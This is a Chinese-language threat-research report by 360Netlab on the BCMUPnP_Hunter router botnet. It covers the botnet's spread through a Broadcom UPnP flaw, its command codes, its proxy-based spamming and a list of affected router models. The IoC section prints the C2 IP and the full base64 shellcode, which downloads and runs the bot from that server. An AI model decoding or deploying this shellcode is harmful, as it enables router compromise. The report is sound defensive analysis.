BCMUPnP_Hunter：疑似10萬節點級殭屍網路正濫用路由器發垃圾郵件

本文由  ofollow,noindex" target="_blank">Hui Wang 、 RootKiter

共同撰寫360Netlab在2018年9月注意到一個新的殭屍網路。該殭屍網路的感染數量特別巨大，每個掃描波次中活躍的IP地址為10萬左右，值得引起安全社群的警惕。

我們將該殭屍網路命名為 BCMUPnP_Hunter，主要是考慮基其感染目標特徵。該殭屍網路有以下幾個特點：

• 感染量特別巨大，每個波次中活躍的掃描IP均在10萬左右；
• 感染目標單一，主要是以BroadCom UPnP為基礎的路由器裝置；
• 樣本捕獲難度大，在高互動蜜罐中需模擬多處裝置環境後才能成功捕獲；
• 自建代理網路(tcp-proxy)，該代理網路由攻擊者自行實現，可以利用 bot端 為跳板，代理訪問網際網路；
• 該代理網路目前主要訪問Outlook，Hotmail，Yahoo! Mail 等知名郵件伺服器，我們高度懷疑攻擊者的意圖主要是和傳送垃圾郵件有關。

處理時間線

• 2013年10月 DefenseCode的安全研究人員發現Broadcom UPnP 實現存在重大安全 漏洞 。考慮到漏洞的嚴重性，並沒有立即公開他們的發現。
• 2017年4月 DefenseCode正式披露了這個 漏洞的細節資訊
• 2018年9月 360Netlab ScanMon系統 檢測到針對TCP 5431 埠的 掃描異常 ，在對基礎資料回溯後，發現該掃描特徵最早可回溯於 2018年1月。
• 2018年10月 定位掃描源頭，並捕獲投遞樣本。

規模評估

• 最近30天針對 埠5431 的掃描源IP趨勢如下：
• 
• 可見掃描不是持續的，而是每隔1-3天構成一個波次。單個波次中活躍的掃描IP在10萬左右，我們正是基於這個資料度量該殭屍網路的規模；
• 歷史上累積看到的掃描源ip有337萬。這個數量雖然巨大，但也許並不意味著已經有這麼多裝置已經被感染，而可能是同一被感染裝置裝置IP隨時間變化導致。
• 潛在易感染數量 超過42萬 ，這個主要是根據掃描源ip返回banner中的web server:Server: Custom/1.0 UPnP/1.0 Proc/Ver從shodan的搜尋結果估計的。
• 最近7天掃描源IP地理位置分佈
• 

被感染裝置資訊

通過對攻擊源的探測，得到了116款被感染的裝置資訊，實際感染裝置種類不限於此：

ADB Broadband S.p.A,HomeStation ADSL Router
ADB Broadband,ADB ADSL Router
ADBB,ADB ADSL Router
ALSiTEC,Broadcom ADSL Router
ASB,ADSL Router
ASB,ChinaNet EPON Router
ASB,ChinaTelecom E8C(EPON) Gateway
Actiontec,Actiontec GT784WN
Actiontec,Verizon ADSL Router
BEC Technologies Inc.,Broadcom ADSL Router
Best IT World India Pvt. Ltd.,150M Wireless-N ADSL2+ Router
Best IT World India Pvt. Ltd.,iB-WRA300N
Billion Electric Co., Ltd.,ADSL2+ Firewall Router
Billion Electric Co., Ltd.,BiPAC 7800NXL
Billion,BiPAC 7700N
Billion,BiPAC 7700N R2
Binatone Telecommunication,Broadcom LAN Router
Broadcom,ADSL Router
Broadcom,ADSL2+ 11n WiFi CPE
Broadcom,BroadcomRouter
Broadcom,Broadcom ADSL Router
Broadcom,D-Link DSL-2640B
Broadcom,D-link ADSL Router
Broadcom,DLink ADSL Router
ClearAccess,Broadcom ADSL Router
Comtrend,AR-5383n
Comtrend,Broadcom ADSL Router
Comtrend,Comtrend single-chip ADSL router
D-Link Corporation.,D-Link DSL-2640B
D-Link Corporation.,D-Link DSL-2641B
D-Link Corporation.,D-Link DSL-2740B
D-Link Corporation.,D-Link DSL-2750B
D-Link Corporation.,D-LinkDSL-2640B
D-Link Corporation.,D-LinkDSL-2641B
D-Link Corporation.,D-LinkDSL-2741B
D-Link Corporation.,DSL-2640B
D-Link,ADSL 4*FE 11n Router
D-Link,D-Link ADSL Router
D-Link,D-Link DSL-2640U
D-Link,D-Link DSL-2730B
D-Link,D-Link DSL-2730U
D-Link,D-Link DSL-2750B
D-Link,D-Link DSL-2750U
D-Link,D-Link DSL-6751
D-Link,D-Link DSL2750U
D-Link,D-Link Router
D-Link,D-link ADSL Router
D-Link,DVA-G3672B-LTT Networks ADSL Router
DARE,Dare router
DLink,D-Link DSL-2730B
DLink,D-Link VDSL Router
DLink,DLink ADSL Router
DQ Technology, Inc.,ADSL2+ 11n WiFi CPE
DQ Technology, Inc.,Broadcom ADSL Router
DSL,ADSL Router
DareGlobal,D-Link ADSL Router
Digicom S.p.A.,ADSL Wireless Modem/Router
Digicom S.p.A.,RAW300C-T03
Dlink,D-Link DSL-225
Eltex,Broadcom ADSL Router
FiberHome,Broadcom ADSL Router
GWD,ChinaTelecom E8C(EPON) Gateway
Genew,Broadcom ADSL Router
INTEX,W150D
INTEX,W300D
INTEX,Wireless N 150 ADSL2+ Modem Router
INTEX,Wireless N 300 ADSL2+ Modem Router
ITI Ltd.,ITI Ltd.ADSL2Plus Modem/Router
Inteno,Broadcom ADSL Router
Intercross,Broadcom ADSL Router
IskraTEL,Broadcom ADSL Router
Kasda,Broadcom ADSL Router
Link-One,Modem Roteador Wireless N ADSL2+ 150 Mbps
Linksys,Cisco X1000
Linksys,Cisco X3500
NB,DSL-2740B
NetComm Wireless Limited,NetComm ADSL2+ Wireless Router
NetComm,NetComm ADSL2+ Wireless Router
NetComm,NetComm WiFi Data and VoIP Gateway
OPTICOM,DSLink 279
Opticom,DSLink 485
Orcon,Genius
QTECH,QTECH
Raisecom,Broadcom ADSL Router
Ramptel,300Mbps ADSL Wireless-N Router
Router,ADSL2+ Router
SCTY,TYKH PON Router
Star-Net,Broadcom ADSL Router
Starbridge Networks,Broadcom ADSL Router
TP-LINK Technologies Co., Ltd,300Mbps Wireless N ADSL2+ Modem Router
TP-LINK Technologies Co., Ltd,300Mbps Wireless N USB ADSL2+ Modem Router
TP-LINK,TP-LINK Wireless ADSL2+ Modem Router
TP-LINK,TP-LINK Wireless ADSL2+ Router
Technicolor,CenturyLink TR-064 v4.0
Tenda,Tenda ADSL2+ WIFI MODEM
Tenda,Tenda ADSL2+ WIFI Router
Tenda,Tenda Gateway
Tenda/Imex,ADSL2+ WIFI-MODEM WITH 3G/4G USB PORT
Tenda/Imex,ADSL2+ WIFI-MODEM WITH EVO SUPPORT
UTStarcom Inc.,UTStarcom ADSL2+ Modem Router
UTStarcom Inc.,UTStarcom ADSL2+ Modem/Wireless Router
UniqueNet Solutions,WLAN N300 ADSL2+ Modem Router
ZTE,Broadcom ADSL Router
ZTE,ONU Router
ZYXEL,ZyXEL VDSL Router
Zhone,Broadcom ADSL Router
Zhone,Zhone Wireless Gateway
Zoom,Zoom Adsl Modem/Router
ZyXEL,CenturyLink UPnP v1.0
ZyXEL,P-660HN-51
ZyXEL,ZyXEL xDSL Router
huaqin,HGU210 v3 Router
iBall Baton,iBall Baton 150M Wireless-N ADSL2+ Router
iiNet Limited,BudiiLite
iiNet,BoB2
iiNet,BoBLite

傳播過程及捕獲

對於每一個隨機生成的 目標IP，Bot端會先探測其TCP 5431埠的開放情況。如果開放，則通過潛在可感染url（訪問 UDP-1900埠 得到這個url）進一步探測漏洞有效性。通過探測檢查的IP會統一彙報到Loader(109.248.9.17:4369)，由Loader完成後續的漏洞利用和植入惡意樣本的過程。

攻擊過程的簡要時序圖如下：

圖1：BCMUPnP_Hunter感染過程（點選圖片放大）

除上述必要的互動外，漏洞利用本身也需要經過多個步驟的互動，才能成功。

但是對於高互動蜜罐的開發人員來說，每一次互動都成了一次考驗。只有正確回答每一次請求，才能成功誘騙投遞者投遞最終樣本。為此我們修改了多種蜜罐，以便能夠完整的模擬受感染裝置，欺騙投遞者，最終完成對該殭屍網路的分析。

樣本部分

該殭屍網路的樣本由兩個部分組成，shellcode和bot主體，下面分別描述其功能。

shellcode

shellcode主要功能，從c2(109.248.9.17:8738)下載主樣本並執行。

該shellcode全長432位元組，工整規範，無法從常見搜尋引擎中檢索到。同時又完美的實現了以下幾點，可見作者功力深厚，並非一般的指令碼小子所為:

• 基礎能力方面：程式碼出現了多處網路、程序、檔案等syscall呼叫；
• 程式碼細節方面：利用 syscall 0x40404（替代 syscall 0）和多次取反操作，進而避免了壞字元(\x00)；程式碼中棧變數也出現了不同程度的複用，以優化執行時的棧結構；
• 程式碼邏輯方面：通過使用迴圈節，合理規避了多種失敗呼叫的情況，保證了shellcode執行的有效性。

其完整流程圖如下，對shellcode感興趣的讀者可以自行閱讀：

圖2：Shellcode/">Shellcode流程圖（點選圖片放大）

樣本主體

樣本主體的功能包括 Broadcom UPnP 漏洞探測和代理訪問網路功能，能夠解析來自C2的4種指令碼：

指令碼包長功能
0x000000000x18首包，有服務偽裝的效果，無實際意義
0x010101010x4c搜尋潛在感染目標任務
0x020202020x08當前任務清空
0x030303030x108訪問代理網路任務

• 0x01010101 為開啟埠掃描任務的指令碼，BOT端一旦掃描到潛在感染目標，便會將目標IP 封包後上報 Loader，隨後Loader會完成後續感染流程。
• 0x03030303 為代理服務指令碼，BOT端會訪問指令中提供的地址，並將訪問結果彙報給主控端。

這些指令中，0x03030303 是可以產生實際經濟利益的，攻擊者可以利用這條指令構建代理網路，進而通過傳送垃圾郵件、模擬點選等等活動牟利。其他的指令只能用於感染和擴張殭屍網路的規模，並不會產生實際的經濟效益。

代理網路和垃圾郵件

為了釐清攻擊者的攻擊意圖，我們通過一系列技術手段繼續跟蹤攻擊者發出的0x03030303 指令。

在我們已經得到的指令中，BCMUPnP_Hunter被用於代理以下伺服器的流量：

104.47.0.33:25
104.47.12.33:25
104.47.124.33:25
104.47.14.33:25
104.47.33.33:25
104.47.48.33:25
104.47.50.33:25
106.10.248.84:25
144.160.159.21:25
188.125.73.87:25
67.195.229.59:25
74.6.137.63:25
74.6.137.64:25
98.137.159.28:25

我們的基礎資料對這些伺服器提供了更加詳細的刻畫：

可以看出：

• 這些伺服器均屬於知名郵件服務提供商，包括Outlook，Hotmail，Yahoo! Mail；
• 幾個月以來，這些伺服器均提供且僅提供了TCP25的服務；
• 在這個案例中，基本可以認為攻擊者在濫用這些伺服器的電子郵件服務；

這讓我們高度懷疑，攻擊者正在利用BCMUPnP_Hunter建立的代理網路傳送垃圾郵件。

聯絡我們

感興趣的讀者，可以在 twitter 或者在微信公眾號 360Netlab 上聯絡我們，或者向我們傳送電子郵件 netlab[at]360.cn。

為避免濫用，我們不會公佈受害者 IP 列表。相關安全和執法機構，可以郵件聯絡netlab[at]360.cn獲取被感染的IP地址列表。

附錄：關於 BroadCom UPnP 漏洞

UPnP是Universal Plug and Play的縮寫，即通用即插即用協議。該協議的目標是使家庭網路（資料共享、通訊和娛樂）和公司網路中的各種裝置能夠相互無縫連線，並簡化相關網路的實現 [1] 。BroadCom UPnP是BroadCom公司針對UPnP協議的具體實現。由於BroadCom在業界處於供應鏈上游，所以該實現被各大路由器廠商採用，包括華碩，D-Link，Zyxel，US Robotics，T​​P-Link，Netgear等。

2013年10月安全研究公司DefenseCode的安全研究人員發現了協議棧中的 BroadCom UPnP 格式化字串漏洞 。考慮到該漏洞影響多家主流路由器廠商的產品，DefenseCode直到2017年才 公開 他們的發現。這次披露的程式碼是驗證性質的，攻擊者在已公開文件的基礎上還須完成必要的漏洞分析和優化shellcode的過程後才能發揮實際的威力。本文涉及的BCMUPnP_Hunter就是如此。

IoC

C2伺服器

109.248.9.17 "Bulgaria/BG" "AS58222 Solar Invest UK LTD" #C2&&Loader

Sample MD5

9036120904827550bf4436a919d3e503

Shellcode(Base64 encode):

AtYgJSQCD6YBAQEMArUgJSQCD6YBAQEMJ6T/yq+k/+CvoP/kJ6X/4CgG//8kAg+rAQEBDCgE//8kAg+hAQEBDAO9uCUnvf/gJA///QHgICckD//9AeAoJygG//8kAhBXAQEBDK+i/9yPtv/cJA8TNwLWICUkD//9AeB4J6ev/+AkDyIip6//4iQPbfinr//kJA8JEaev/+avoP/or6D/7Cel/+AkD//vAeAwJyQCEEoBAQEMJA8vdKev/8okD21wp6//zCQPL3Snr//OJA9tcKev/9AkD2Zzp6//0qeg/9QnpP/KJA/+EgHgKCckAg/HAQEBDCgE//8npf/KJ6b/zygH//+u4P/wJAIPtQEBAQwkDy90p6//1CQPbXCnr//WJA9mc6ev/9inoP/aJ6T/yiQP/hIB4CgnJAIPqAEBAQyvov/cj7X/3CQPEzcC1iAlJ6X/4CQP/98B4DAnKAf//yQCEE8BAQEMr6L/3I+0/9wkDxM3BoD/ryQPEzcagP+gJA8TNwK1ICUnpf/gApQwJSQCD6QBAQEMFoL/piQPEzcSgv/qJA8TNzQP3q00D96t